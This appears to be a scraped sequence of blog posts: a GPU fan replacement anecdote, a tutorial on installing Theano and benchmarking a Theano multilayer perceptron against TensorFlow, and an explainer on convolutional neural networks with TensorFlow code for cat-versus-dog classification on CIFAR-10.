Upon further investigation, the base of the fan was found to be cracked. The crack can be seen in the photo that follows.

Okay. The crack was not originally quite as extensive. But, after several failed super-glue attempts, I decided to go for the Hail Mary. Unfortunately, my last-ditch effort was likewise unsuccessful. Rather than spend more time and money on an epoxy Frankenstein kludge, I decided a replacement fan would be a substantially less dubious solution. I ordered a Delta BFB0712HF 65mm x 37mm fan.

After several days on pins and needles, imagining all the things that might go wrong, the fan arrived. Quite unexpectedly (given my luck), it was a perfect fit; the fan was nearly, if not truly, identical to the original fan. The third fan screw is under one of the heat pads, by the way.

Now begins the tedious process of reassembling the GPU. In projects like this, I find it very helpful to stay organized. So, basically, **not** like this:

As an aside, one of the benefits of having your health reduced to shambles is that you have a lot of extra containers to organize screws. Life is chock-full of such silver linings.

Next I cleaned off the old thermal paste and took several scandalous photos of my new GPU.

For thermal paste I used Arctic Silver 5. I started using that brand because other people use it. And those people probably did much the same. And so on, etc. Flawless logic. Except that Intel uses thermal paste produced by Dow Corning. Hmm.

All done! Now for the nerve-wracking part. Images of my rig going up in smoke and taking the rest of the apartment with it flash before my eyes.

Anyway, it works. Cool.

Even better, it's averaging 35°C under load, and the fan is pretty quiet. Nice!


An easy way to get Theano working quickly is to first install Anaconda. Anaconda is packaged with Python, NumPy, and several of the other installation requirements, bundled together in a convenient installer (see Figure 1). This guide recommends using Anaconda3-4.2.0 for 64-bit Windows for simultaneous compatibility with TensorFlow.

**Figure 1: Anaconda Python Installer**

An additional required dependency is a GCC toolchain. If the computer has an existing version of GCC or G++ installed, environment variables may need to be set to ensure Theano uses the appropriate toolchain. In Windows, environment variables can be viewed by typing *set* at the command prompt. System environment variables can be modified under *System* -> *Change Settings* -> *Advanced* -> *Environment Variables* (on Server 2012 R2). User environment variables are set under *User Accounts* -> *Change my environment variables*. If there are no conflicting GCC toolchains (mingw, mingw64, etc.), the m2w64-toolchain can be installed by typing *conda install m2w64-toolchain* at an Anaconda Command Prompt. This makes G++ available in the Anaconda Prompt (a special command prompt, bundled with Anaconda, that includes extra environment variables).

**Figure 2: Setting System Environment Variables in Windows**

If the computer has an NVidia GPU with CUDA Compute Capability of 1.2 or greater, Theano can be configured to run on the GPU. NVidia’s website has a page that lists the Compute Capability for each of their supported cards. CUDA can be downloaded here. **Note**: CUDA recommends installing Visual Studio for full support. Visual Studio 2010 was used for this guide.

With the above dependencies installed, Theano can be installed by typing: *conda install theano pygpu* at an Anaconda Command Prompt. **Note**: At the time of writing this post, there is a memory leak issue in Theano 0.9.0 causing memory consumption to grow without bound. Version 0.8.2 does not have this issue and can be installed using *conda install theano=0.8.2*.

Similar to TensorFlow, most Theano functions create graph operations that are not immediately performed. This computation graph is later evaluated to perform the actual desired operations.
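The deferred-evaluation idea can be sketched without Theano at all. The toy `Var` class below is purely illustrative (not part of Theano's API): building an expression records operations in a graph, and nothing is computed until `evaluate` is called with concrete inputs.

```python
class Var:
    """A node in a tiny computation graph."""
    def __init__(self, name=None, op=None, args=()):
        self.name, self.op, self.args = name, op, args

    def __add__(self, other):
        return Var(op=lambda a, b: a + b, args=(self, other))

    def __mul__(self, other):
        return Var(op=lambda a, b: a * b, args=(self, other))

    def evaluate(self, env):
        """Recursively evaluate the graph given a dict of input values."""
        if self.op is None:
            return env[self.name]   # Leaf node: look up the input value
        return self.op(*(a.evaluate(env) for a in self.args))

x, y = Var('x'), Var('y')
z = x * y + x                       # Nothing is computed yet; z is just a graph
print(z.evaluate({'x': 3, 'y': 4})) # The graph runs only now: 3*4 + 3 = 15
```

Theano's shared variables and `theano.function` play analogous roles on a much richer graph that also supports symbolic differentiation.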

In this class, the MLP network is constructed using the typical matrix multiplication representation. The output of a layer is the matrix product of the input matrix with the weight matrix. A bias term is added to the product, and then an activation function is applied element-wise to the result. For more details about the math behind MLP networks, see a past blog post. Code to set up the MLP class is as follows:

```python
import numpy as np
import theano
import theano.tensor as T

#Create an MLP: A sequence of fully-connected layers with an activation
#function AF applied at all layers except the last.
#X: The input tensor
#W: A list of weight tensors for layers of the MLP
#B: A list of bias tensors for the layers of the MLP
#AF: The activation function to be used at hidden layers
#Ret: The network output
def CreateMLP(X, W, B, AF):
    n = len(W)
    for i in range(n - 1):
        X = AF(X.dot(W[i]) + B[i])
    return X.dot(W[n - 1]) + B[n - 1]

#Creates weight and bias matrices for an MLP network
#given a list of the layer sizes.
#L: A list of the layer sizes
#Ret: The lists of weight and bias matrices (W, B)
def CreateMLPWeights(L):
    W, B = [], []
    n = len(L)
    for i in range(n - 1):
        #Use Xavier initialization for weights
        xv = np.sqrt(6. / (L[i] + L[i + 1]))
        W.append(theano.shared(np.random.uniform(-xv, xv, [L[i], L[i + 1]])))
        #Initialize bias to 0
        B.append(theano.shared(np.zeros([L[i + 1]])))
    return (W, B)

#Given a string of the activation function name, return the
#corresponding Theano function.
#Ret: The Theano activation function handle
def GetActivationFunction(name):
    if name == 'tanh':
        return T.tanh
    elif name == 'sig':
        return T.nnet.sigmoid
    elif name == 'fsig':
        return T.nnet.ultra_fast_sigmoid
    elif name == 'relu':
        return T.nnet.relu
    elif name == 'softmax':
        return T.nnet.softmax

class TheanoMLPR:

    def __init__(self, layers, actfn = 'tanh', batchSize = None, learnRate = 1e-3,
                 maxIter = 1000, tol = 5e-2, verbose = True):
        self.AF = GetActivationFunction(actfn)
        #Batch size
        self.bs = batchSize
        self.L = layers
        self.lr = learnRate
        #Error tolerance for early stopping criterion
        self.tol = tol
        #Toggles verbose output
        self.verbose = verbose
        #Maximum number of iterations to run
        self.nIter = maxIter
        #Input matrix
        self.X = T.matrix()
        #Output matrix
        self.Y = T.matrix()
        #Weight and bias matrices
        self.W, self.B = CreateMLPWeights(layers)
        #The result of a forward pass of the network
        self.YH = CreateMLP(self.X, self.W, self.B, self.AF)
        #Use L2 loss for network
        self.loss = ((self.YH - self.Y) ** 2).mean()
        #Function for performing a forward pass
        self.ffp = theano.function([self.X], self.YH)
        #For computing the loss
        self.fcl = theano.function([self.X, self.Y], self.loss)
        #Gradients for weight matrices
        self.DW = [T.grad(self.loss, Wi) for Wi in self.W]
        #Gradients for bias
        self.DB = [T.grad(self.loss, Bi) for Bi in self.B]
        #Weight update terms
        WU = [(self.W[i], self.W[i] - self.lr * self.DW[i]) for i in range(len(self.DW))]
        BU = [(self.B[i], self.B[i] - self.lr * self.DB[i]) for i in range(len(self.DB))]
        #Gradient step
        self.fgs = theano.function([self.X, self.Y], updates = tuple(WU + BU))
```

As can be seen above, the network graph is created in the constructor of the TheanoMLPR class. Note that *self.X* and *self.Y* are placeholders for the input matrices, similar to TensorFlow. *theano.function* creates a callable that feeds input into the computation graph and retrieves output from it. For instance, *self.ffp = theano.function([self.X], self.YH)* creates a function that takes *self.X* as input and performs the operations necessary to compute *self.YH*. Since *self.YH* is defined as the feedforward step (see *CreateMLP*), *self.ffp* performs the feedforward process of the MLP.

Fitting the network is done similarly to the corresponding MLPR TensorFlow class. On each training iteration, the gradients are computed for the network and then applied to the weight and bias matrices using *self.fgs*. Prediction and scoring are simple applications of the functions defined in the constructor. The remaining code for the class is as follows:

```python
    #Initializes the weight and bias matrices of the network
    def Initialize(self):
        n = len(self.L)
        for i in range(n - 1):
            #Use Xavier initialization for weights
            xv = np.sqrt(6. / (self.L[i] + self.L[i + 1]))
            self.W[i].set_value(np.random.uniform(-xv, xv, [self.L[i], self.L[i + 1]]))
            #Initialize bias to 0
            self.B[i].set_value(np.zeros([self.L[i + 1]]))

    #Fit the MLP to the data
    #A: numpy matrix where each row is a sample
    #Y: numpy matrix of target values
    def fit(self, A, Y):
        self.Initialize()
        m = len(A)
        for i in range(self.nIter):
            if self.bs is None:
                #Use all samples; perform the gradient step
                self.fgs(A, Y)
            else:
                #Train m samples using random batches of size self.bs
                for _ in range(0, m, self.bs):
                    #Choose a random batch of samples
                    bi = np.random.randint(m, size = self.bs)
                    #Perform the gradient step on the batch
                    self.fgs(A[bi], Y[bi])
            if i % 10 == 9:
                loss = self.score(A, Y)
                if self.verbose:
                    print('Iter {:7d}: {:8f}'.format(1 + i, loss))
                if loss < self.tol:
                    break

    #Predict the output given the input (only run after calling fit)
    #A: The input values for which to predict outputs
    #Ret: The predicted output values (one row per input sample)
    def predict(self, A):
        return self.ffp(A)

    #Predicts the outputs for input A and then computes the loss term
    #between the predicted and actual outputs
    #A: The input values for which to predict outputs
    #Y: The actual target values
    #Ret: The network loss term
    def score(self, A, Y):
        return np.float64(self.fcl(A, Y))
```

The complete code for the class is available here on GitHub.

Next, a benchmark is constructed to compare the performance of the TheanoMLPR class with that of the MLPR class from TFANN developed earlier. A data set comprised of random data is generated; the target value for each sample is the square of the mean of the sample vector. The sample matrix is then perturbed by uniform random values in [0, 1] and rescaled to the range [0, 1]. The sample and target matrices are written to file so that both benchmarks can use identical data sets.

```python
#Generate data with nf features and ns samples. If new data
#is generated, write it to file so it can be reused across all benchmarks
def GenerateData(nf = 256, ns = 16384):
    try:
        #Try to read data from file
        A = np.loadtxt('bdatA.csv', delimiter = ',')
        Y = np.loadtxt('bdatY.csv', delimiter = ',').reshape(-1, 1)
    except OSError:
        #New data needs to be generated
        x = np.linspace(-1, 1, num = ns).reshape(-1, 1)
        A = np.concatenate([x] * nf, axis = 1)
        Y = ((np.sum(A, axis = 1) / nf) ** 2).reshape(-1, 1)
        A = (A + np.random.rand(ns, nf)) / 2.0
        np.savetxt('bdatA.csv', A, delimiter = ',')
        np.savetxt('bdatY.csv', Y, delimiter = ',')
    return (A, Y)
```

The benchmark compares the time taken for each model in training and testing. The amount of time to train and test each model is measured as the number of samples in the data set increases. The original data set is divided into *n* pieces and the training and testing times using the first *i* chunks are recorded.

```python
#R: Regressor network to use
#A: The sample data matrix
#Y: Target data matrix
#nt: Number of times to divide the sample matrix
#fn: File name to write results
def MakeBenchDataSample(R, A, Y, nt, fn):
    #Divide the samples into nt pieces; for each i, run the benchmark with chunks 0, 1, ..., i
    step = A.shape[0] // nt
    TT = np.zeros((nt, 3))
    for i in range(1, nt):
        #Number of samples
        TT[i, 0] = i * step
        print('{:8d} sample benchmark.'.format(int(TT[i, 0])))
        #Training and testing times respectively
        TT[i, 1], TT[i, 2] = RunBenchmark(R, A[0:(i * step)], Y[0:(i * step)])
    #Save benchmark data to csv file
    np.savetxt(fn, TT, delimiter = ',', header = 'Samples,Train,Test')

#Plots benchmark data on a given matplotlib axes object
#X: X-axis data
#Y: Y-axis data
#ax: The axes object
#xlab: Label for the x-axis
#name: Name of plot for title
#lab: Label of the data for the legend
def PlotBenchmark(X, Y, ax, xlab, name, lab):
    ax.set_xlabel(xlab)
    ax.set_ylabel('Avg. Time (s)')
    ax.set_title(name + ' Benchmark')
    ax.plot(X, Y, linewidth = 1.618, label = lab)
    ax.legend(loc = 'upper left')

#Runs a benchmark on a MLPR model
#R: Regressor network to use
#A: The sample data matrix
#Y: Target data matrix
def RunBenchmark(R, A, Y):
    #Record training time
    t0 = time.time()
    R.fit(A, Y)
    t1 = time.time()
    trnt = t1 - t0
    #Record testing time
    t0 = time.time()
    YH = R.predict(A)
    t1 = time.time()
    tstt = t1 - t0
    return (trnt, tstt)
```

To allow for a fairer comparison, the main program performs a single benchmark on each run. This is accomplished by passing a command-line argument to the program to indicate which benchmark to run: *tensorflow*, *theanogpu*, or *theano*. The command-line argument *plot* loads the generated benchmark data and plots it using matplotlib.

```python
def Main():
    if len(sys.argv) <= 1:
        return
    A, Y = GenerateData(ns = 2048)
    #Create layer sizes; make 6 layers of nf neurons followed by a single output neuron
    L = [A.shape[1]] * 6 + [1]
    print('Layer Sizes: ' + str(L))
    if sys.argv[1] == 'theano':
        print('Running theano benchmark.')
        from TheanoANN import TheanoMLPR
        #Create the Theano MLP
        tmlp = TheanoMLPR(L, batchSize = 128, learnRate = 1e-5, maxIter = 100, tol = 1e-3, verbose = True)
        MakeBenchDataSample(tmlp, A, Y, 16, 'TheanoSampDat.csv')
        print('Done. Data written to TheanoSampDat.csv.')
    if sys.argv[1] == 'theanogpu':
        print('Running theano GPU benchmark.')
        #Set optional flags for the GPU
        #Environment flags need to be set before importing theano
        os.environ["THEANO_FLAGS"] = "device=gpu"
        from TheanoANN import TheanoMLPR
        #Create the Theano MLP
        tmlp = TheanoMLPR(L, batchSize = 128, learnRate = 1e-5, maxIter = 100, tol = 1e-3, verbose = True)
        MakeBenchDataSample(tmlp, A, Y, 16, 'TheanoGPUSampDat.csv')
        print('Done. Data written to TheanoGPUSampDat.csv.')
    if sys.argv[1] == 'tensorflow':
        print('Running tensorflow benchmark.')
        from TFANN import MLPR
        #Create the Tensorflow model
        mlpr = MLPR(L, batchSize = 128, learnRate = 1e-5, maxIter = 100, tol = 1e-3, verbose = True)
        MakeBenchDataSample(mlpr, A, Y, 16, 'TfSampDat.csv')
        print('Done. Data written to TfSampDat.csv.')
    if sys.argv[1] == 'plot':
        print('Displaying results.')
        try:
            T1 = np.loadtxt('TheanoSampDat.csv', delimiter = ',', skiprows = 1)
        except OSError:
            T1 = None
        try:
            T2 = np.loadtxt('TfSampDat.csv', delimiter = ',', skiprows = 1)
        except OSError:
            T2 = None
        try:
            T3 = np.loadtxt('TheanoGPUSampDat.csv', delimiter = ',', skiprows = 1)
        except OSError:
            T3 = None
        fig, ax = mpl.subplots(1, 2)
        if T1 is not None:
            PlotBenchmark(T1[:, 0], T1[:, 1], ax[0], '# Samples', 'Train', 'Theano')
            PlotBenchmark(T1[:, 0], T1[:, 2], ax[1], '# Samples', 'Test', 'Theano')
        if T2 is not None:
            PlotBenchmark(T2[:, 0], T2[:, 1], ax[0], '# Samples', 'Train', 'Tensorflow')
            PlotBenchmark(T2[:, 0], T2[:, 2], ax[1], '# Samples', 'Test', 'Tensorflow')
        if T3 is not None:
            PlotBenchmark(T3[:, 0], T3[:, 1], ax[0], '# Samples', 'Train', 'Theano GPU')
            PlotBenchmark(T3[:, 0], T3[:, 2], ax[1], '# Samples', 'Test', 'Theano GPU')
        mpl.show()
```

The completed code for the benchmark is available here on GitHub.

The above code was run on a Z800 workstation running Windows Server 2012 R2. The system has the following configuration:

- 2x Intel Xeon X5675 (Costa Rica) @ 3.06 GHz
- 96GB PC3-10600R 1333MHz RAM
- 4x 300GB 15000RPM SAS Drives in RAID 0
- 2x NVidia Quadro 5000 2.5GB

The system is pictured below in Figure 3.

**Figure 3: The Benchmark Rig**

The following commands can be used to generate the results and plots:

```shell
python Main.py theano
python Main.py theanogpu
python Main.py tensorflow
python Main.py plot
```

**Note**: For GPU-based Theano, both the *cl* compiler and *g++* must be in the *PATH* environment variable for the GPU to be used. This can be accomplished by running the *vcvarsall.bat* script that comes with Visual Studio inside an Anaconda prompt. The path to *vcvarsall.bat* may look similar to: *C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\vcvarsall.bat*. The plot generated by the program is shown below in Figure 4.

**Figure 4: TensorFlow vs. Theano Benchmark Results**

The above benchmark is constructed in an attempt to give a fair comparison between the two libraries, but it is by no means exhaustive. ANNs have numerous hyper-parameters, and more benchmarks could be created to gain a better understanding of the performance trade-offs between TensorFlow and Theano. Because the CUDA Compute Capability of the Quadro 5000 is only 2.0, the author is unable to benchmark GPU-enabled TensorFlow.

The author is more than happy to include your benchmark results in this post if you share them below in a comment.


Past blog posts have explored multi-layer perceptron (MLP) networks. Recall from those posts that MLPs are fully-connected: each neuron in a layer is connected to every neuron in the previous layer. An example of an MLP network is shown below in Figure 1.

**Figure 1: A Multi-Layer Perceptron Network**

Fully-connected layers are reasonable for networks with relatively few neurons in each layer, but not so for networks having many neurons in each layer. For example, consider a network which is trained on image data. Images are typically stored as three matrices of pixel values, corresponding to the red, green, and blue channels respectively. Since every pixel of every channel connects to every neuron in the first hidden layer, the number of weights in the first weight matrix is the number of pixels, times three, times the number of neurons in that layer.
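As a concrete (hypothetical) worked example, suppose the input is a 32x32 RGB image and the first hidden layer has 1024 neurons; the numbers below are assumptions chosen for illustration:

```python
#Hypothetical sizes for illustration: a 32x32 RGB image feeding a
#fully-connected hidden layer of 1024 neurons.
height, width, channels = 32, 32, 3
hidden = 1024
n_inputs = height * width * channels    #3072 flattened pixel values
n_weights = n_inputs * hidden           #One weight per (input, neuron) pair
print(n_weights)                        #3145728 weights in a single layer
```

Even at this modest image size, a single fully-connected layer already requires over three million weights.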

The drawback of the above approach is twofold. First, having a large number of weights results in increased training times, as the complexity of the matrix operations involved scales roughly cubically with the layer size (assuming layer sizes differ from each other only by a constant). Second, the large number of parameters in the model makes it prone to overfitting.

If the input data to the network is assumed to be images, some simplifications can be made. The key idea behind convolutional neural networks is that the pixels in images typically have a spatial relationship to each other; each pixel in an image is typically related to other pixels nearby it. For example, in an image of a brown cat, if a pixel is taken from the cat’s fur, it is likely that other nearby pixels are also brown. By making this assumption, the number of weights in the network can be greatly reduced.

In addition to the fully-connected layer seen in MLPs, CNNs feature additional types of layers. Two common layers are discussed in this post: the convolutional layer and the pooling layer. Fully-connected layers in CNNs are identical to those seen in MLPs. Convolutional and pooling layers are discussed below in turn.

A key difference between MLPs and CNNs is that neurons in the convolutional and pooling layers of a CNN are logically arranged in 3 dimensions. Further, these layers are thought to take as input a 3D matrix of activations and produce a 3D matrix of activations. These 3 dimensions initially correspond to the 3 dimensions of the input image: height, width, and channel (red, green, or blue). Figure 2 below shows the way in which an image (the input to the first layer) is arranged as a 3D grid of activations.

**Figure 2: 3D Structure of Activations of Image Data**

Subsequent layers in the CNN transform the image into different 3D grids of neuron activations. Neurons receive input only from neurons in a small rectangular volume of the neurons in the previous layer. Though the height and width of the rectangular volume are parameters, neurons always receive input across all channels of the input volume. At fully-connected layers, the input is flattened into a row vector as with MLPs.

The convolutional layer utilizes the assumption that pixels are spatially related to each other by restricting the inputs to which each neuron is connected. A neuron receives input from neurons falling inside a rectangular field across all channels of the input volume. The activation of an individual neuron is the sum (over all channels) of the dot product of the weight matrix with the input matrices. By passing the rectangular filter over the input volume, a 2D matrix of activations is created. The distance between consecutive positions of the filter in a given dimension is a parameter known as the *stride*. Figure 3 below shows the difference between a stride of 1 (on the left) and 2 (on the right) in the width dimension.

**Figure 3: Effect of Different Stride Values**
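The per-neuron computation described above can be sketched in NumPy. The function below is illustrative only (real frameworks use heavily optimized kernels): it slides a single filter spanning all channels over an unpadded input volume, producing one 2D activation map.

```python
import numpy as np

def conv2d_single(X, W, stride=1):
    """Slide one filter W (fh x fw x C) over input X (H x W x C), no padding.
    Each output cell is the sum over all channels of the elementwise
    product of the filter with the input patch beneath it."""
    H, Wd, C = X.shape
    fh, fw, _ = W.shape
    oh = (H - fh) // stride + 1
    ow = (Wd - fw) // stride + 1
    out = np.zeros((oh, ow))
    for i in range(oh):
        for j in range(ow):
            patch = X[i*stride:i*stride+fh, j*stride:j*stride+fw, :]
            out[i, j] = np.sum(patch * W)
    return out

X = np.ones((5, 5, 3))              #Toy 5x5 RGB input volume
W = np.ones((3, 3, 3))              #One 3x3 filter spanning all 3 channels
print(conv2d_single(X, W).shape)    #(3, 3): a 2D activation map per filter
```

Running several different filters and stacking their 2D outputs yields the 3D output volume described below.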

The process of passing a filter over the input is repeated once for each of the filters used in the particular convolutional layer. The results of these passes (each producing a 2D matrix) are concatenated to form a 3D matrix. Thus, each filter produces its own channel in the output volume.

Figure 4 below shows the way in which the output volume of neuron activations is computed. In the animation below, the filter is passed over the input volume with a stride of 1 in all dimensions.

**Figure 4: Sliding Filter of a Convolutional Layer**

Note in the animation that when the filter extends beyond the bounds of the input volume, the out-of-bounds values are taken (typically) to be 0. This is known as padding. In practice, the input is typically padded with zeros so that the height and width of the input volume are preserved across a convolutional layer. Also, note that the height and width of the output volume are determined by the height and width of the input volume, the filter size, the amount of padding, and the stride values. The depth of the output volume, however, is an arbitrary parameter and is not affected by the depth of the input volume.
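The standard relationship between these quantities can be written as a small helper function (for input size n, filter size f, padding p on each side, and stride s):

```python
def conv_output_size(n, f, p, s):
    """Output height (or width) of a convolutional layer for input size n,
    filter size f, padding p on each side, and stride s."""
    return (n - f + 2 * p) // s + 1

#Padding of (f - 1) / 2 with stride 1 preserves the input size:
print(conv_output_size(32, 5, 2, 1))   #32
#No padding shrinks the output:
print(conv_output_size(32, 5, 0, 1))   #28
```

The same formula applies independently to the height and width dimensions.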

The second new type of layer is the pooling layer. Similar to convolutional layers, the cells in the output volume produced by a pooling layer are computed by passing a rectangular window over the input volume. However, instead of computing dot products, only a single value in the window is selected. This is a form of downsampling. With max pooling, only the maximum value in the window is preserved and the remaining values are discarded. For example, if the filter was of size 2x2 and contained the following values:

the max value of 0.654 would be preserved and the remaining 3 values would be discarded. This downsampling reduces the dimensionality of the problem without losing too much information. The main reason this loss of data is acceptable is that it was assumed that pixels are related to other nearby pixels. Note that there are no weights in a pooling layer; the pool function is simply applied to the output volume of the previous layer and the resulting volume is passed to the next layer.
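Max pooling over a single channel can be sketched in a few lines of NumPy (illustrative only; the data values below are made up for the example):

```python
import numpy as np

def max_pool2d(X, k=2, stride=2):
    """Max pooling sketch on a single-channel input X (H x W):
    keep only the maximum value in each k x k window."""
    H, W = X.shape
    oh, ow = (H - k) // stride + 1, (W - k) // stride + 1
    out = np.zeros((oh, ow))
    for i in range(oh):
        for j in range(ow):
            out[i, j] = X[i*stride:i*stride+k, j*stride:j*stride+k].max()
    return out

X = np.array([[0.1,   0.2, 0.3, 0.1],
              [0.654, 0.0, 0.2, 0.4],
              [0.5,   0.6, 0.7, 0.8],
              [0.1,   0.2, 0.9, 0.3]])
print(max_pool2d(X))   #[[0.654, 0.4], [0.6, 0.9]]
```

In a CNN the same pooling operation is applied to each channel of the input volume independently, so the depth is unchanged while the height and width shrink.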

After the data has been filtered and downsampled in some sequence of convolution and pooling layers it can be distilled into some output vector using one or more fully-connected layers. This is accomplished by flattening the output volume into a single row vector and applying the familiar steps of an MLP network.

The TFMLP file that was introduced in a past blog post is extended to support CNNs. Now that the module supports both MLPs and CNNs, it has been renamed to TFANN (short for TensorFlow Artificial Neural Networks). To promote code reuse, a base artificial neural network (ANN) class is created from which the MLP and CNN classes inherit. A simple class diagram showing the classes in the TFANN module is shown below in Figure 5.

**Figure 5: TFANN Class Diagram**

The ANN class provides functionality for maintaining a TensorFlow session and contains data members that are used in all ANN subclasses. The ANNC and ANNR subclasses correspond to neural networks that are used for classification and regression respectively. These subclasses provide functions that are used for fitting, scoring, and predicting with the neural network models, regardless of their actual architecture (CNN, MLP, etc). The leaf classes actually implement the specific neural network architectures by populating the TensorFlow graph with operations to perform the network’s functionality. Note: The refactored MLPR and MLPC classes should work identically to those of past versions.

Of specific interest to this post is the CNNC class. The name CNNC is short for Convolutional Neural Network for Classification. The majority of the functionality for the class is identical to that of the MLPC class. The major difference is in the *_CreateCNN* function.

```python
#Sets up the graph for a convolutional neural network
#from a list of specifications of the form:
#[('C', [5, 5, 3, 64], [1, 1, 1, 1]), ('P', [1, 3, 3, 1], [1, 2, 2, 1]), ('F', 10)]
#Where 'C' denotes a convolution layer, 'P' denotes a pooling layer, and 'F' denotes
#a fully-connected layer.
def _CreateCNN(self, ws):
    self.W = []
    self.B = []
    YH = self.X
    for i, wsi in enumerate(ws):
        if wsi[0] == 'C':       #Convolutional layer
            self.W.append(tf.Variable(tf.truncated_normal(wsi[1], stddev = 5e-2)))
            self.B.append(tf.Variable(tf.constant(0.0, shape = [wsi[1][-1]])))
            YH = tf.nn.conv2d(YH, self.W[-1], wsi[2], padding = self.pad)
            YH = tf.nn.bias_add(YH, self.B[-1])
            #Apply the activation function to the output
            YH = self.AF(YH)
        elif wsi[0] == 'P':     #Pooling layer
            YH = tf.nn.max_pool(YH, ksize = wsi[1], strides = wsi[2], padding = self.pad)
            YH = tf.nn.lrn(YH, 4, bias = 1.0, alpha = 0.001 / 9.0, beta = 0.75)
        elif wsi[0] == 'F':     #Fully-connected layer
            #Flatten volume of previous layer for fully-connected layer
            yhs = YH.get_shape()
            lls = 1
            for j in yhs[1:]:
                lls *= j.value
            YH = tf.reshape(YH, [-1, lls])
            self.W.append(tf.Variable(tf.truncated_normal([lls, wsi[1]], stddev = 0.04)))
            self.B.append(tf.Variable(tf.constant(0.1, shape = [wsi[1]])))
            YH = tf.matmul(YH, self.W[-1]) + self.B[-1]
            #Last layer shouldn't apply activation function
            if i + 1 != len(ws):
                YH = self.AF(YH)
    return YH
```

The above function creates the CNN based on a list of tuples which specify both the type of layer and parameters for the layer. In the above code, ‘C’ denotes a convolutional layer, ‘P’ denotes a pooling layer, and ‘F’ denotes a fully-connected layer.

For convolutional layers, the 2nd member of the tuple corresponds to the filter size and is of the form: [filterWidth, filterHeight, inChannels, outChannels]. The first three values determine the size of the rectangular solid (the receptive field) to which neurons are connected. The above discussion assumed that inChannels is equal to the full depth of the input volume. The final value determines the number of filters that are used (recall that this was arbitrary). The 3rd member of the tuple corresponds to the stride values for the filter for each of the 4 dimensions of the input data: [batchSize, height, width, channel]. Stride values determine the space between two filter positions as it passes over the input volume.

In the case of pooling layers, the 2nd member of the tuple corresponds to the filter size from which the max value is selected and is of the form: [batch, height, width, channel]. The 3rd member of the tuple corresponds to the stride value for each dimension and is of the same form: [batch, height, width, channel]. The fully-connected layers require only one parameter: the number of neurons in the layer.

With the above function and inheritance hierarchy, the actual implementation of the CNNC class is quite brief. As seen below, the sum of the softmax cross entropy is taken as the loss function along with optional L2 regularization.

```python
#Convolutional Neural Network for Classification
class CNNC(ANNC):

    #imageSize: Size of the images used (Height, Width, Depth)
    #ws: Weight matrix sizes
    def __init__(self, imageSize, ws, actvFn = 'relu', batchSize = None, learnRate = 1e-4,
                 maxIter = 1000, optmzr = 'adam', pad = 'SAME', tol = 1e-1, reg = None, verbose = False):
        #Initialize fields from base class
        super().__init__(actvFn, batchSize, learnRate, maxIter, optmzr, reg, tol, verbose)
        #Input placeholder
        self.imgSize = list(imageSize)
        self.X = tf.placeholder("float", [None] + self.imgSize)
        #Padding method to use
        self.pad = pad
        #Target vector placeholder; final layer should be a fully-connected layer
        self.Y = tf.placeholder("float", [None, ws[-1][1]])
        #Create neural network graph and keep track of output variable
        self.YH = self._CreateCNN(ws)
        #Loss term
        self.loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(self.YH, self.Y))
        #Use regularization to prevent over-fitting
        self.reg = reg
        if reg is not None:
            self.loss += _CreateL2Reg(self.W, self.B) * reg
        self.optmzr = _GetOptimizer(optmzr, learnRate).minimize(self.loss)
        #Begin the TensorFlow Session
        self.RunSession()
```

Next, a brief example using the CNNC class is created using the CIFAR-10 dataset. The dataset is available here on Kaggle. CIFAR-10 is a classic data set used for object recognition that consists of 60,000 images divided into 10 classes (cat, dog, car, airplane, etc.). This example will train a CNN to classify an image as either containing a cat or a dog. The code that follows assumes the *train.7z* file has been extracted into a folder *train/* and the current directory contains the *trainLabels.csv* file.

First, the training labels file is scanned, and only images from the cat and dog classes are retained. Then, 2048 random file names are selected from this set to form the training set. Next, the images are read into memory and the target vectors are formed. The target vectors are simple 2-component vectors containing a single 1 and a single 0, indicating whether the target class is “cat” or “dog.” The images are read using the skimage library.

```python
import os
from random import sample

import numpy as np
import matplotlib.pyplot as mpl
from skimage.io import imread
from skimage import img_as_float
from sklearn.model_selection import KFold
from TFANN import CNNC

#The maximum number of images to use
maxImg = 2048
#Path to directory with CIFAR-10 images
p = 'train/'
labs = []
fns = []
with open('trainLabels.csv') as rf:
    for line in rf:
        #Rows of CSV are like: index,label
        cnum, clab = line.strip().split(',')
        if clab == 'cat' or clab == 'dog':
            fns.append(cnum + '.png')
            labs.append(clab)
#Take a random sample of the image indices
si = sample(list(range(len(fns))), maxImg)
#File names that were selected
fs = [fns[sij] for sij in si]
#Shape of the data matrix [maxImg x imageWidth x imageHeight x 3]
A = np.zeros([maxImg] + list(imread(os.path.join(p, fns[0])).shape))
for i, fsi in enumerate(fs):
    #Fill in images converting from 0-255 to 0.0-1.0
    A[i] = img_as_float(imread(os.path.join(p, fsi)))
#Numpy array of labels
Y = np.array([labs[sij] for sij in si])
```
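The label strings in *Y* are converted to one-hot target vectors internally by the classification class; the encoding idea can be sketched as follows (illustrative only, with made-up labels):

```python
import numpy as np

labels = ['cat', 'dog', 'dog', 'cat']
classes = sorted(set(labels))               #['cat', 'dog']
Y1h = np.zeros((len(labels), len(classes)))
for i, lab in enumerate(labels):
    Y1h[i, classes.index(lab)] = 1.0        #Exactly one 1 per row
print(Y1h)
```

Each row has a single 1 in the column of its class, which is the 2-component form the network's softmax output is trained against.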

Next, a CNNC object is created, fitted to the data, and used to predict labels for the training data. Finally, the first several images are displayed along with their predicted classes.

```python
#Create the CNN
ws = [('C', [5, 5, 3, 64], [1, 1, 1, 1]), ('P', [1, 3, 3, 1], [1, 2, 2, 1]),
      ('C', [5, 5, 64, 64], [1, 1, 1, 1]), ('P', [1, 3, 3, 1], [1, 2, 2, 1]),
      ('F', 64), ('F', 16), ('F', 2)]
cnnr = CNNC(A[0].shape, ws, batchSize = 256, maxIter = 5, reg = 5e-2, tol = 7e-2, verbose = True)
#Make a training/testing split
kf = KFold()
trn, tst = next(kf.split(A))
cnnr.fit(A[trn], Y[trn])
#Predict labels for all files
YH = cnnr.predict(A)
#Score the model using the accuracy rating
s1 = cnnr.score(A, Y)
s2 = cnnr.score(A[tst], Y[tst])
s3 = cnnr.score(A[trn], Y[trn])
print(str((s1, s2, s3)))
#Plot the first m x n images in a grid with their predicted labels
m = 6
n = 12
fig, ax = mpl.subplots(m, n)
for i in range(m):
    for j in range(n):
        ax[i, j].imshow(A[i * n + j])
        ax[i, j].set_title(YH[i * n + j])
mpl.show()
```

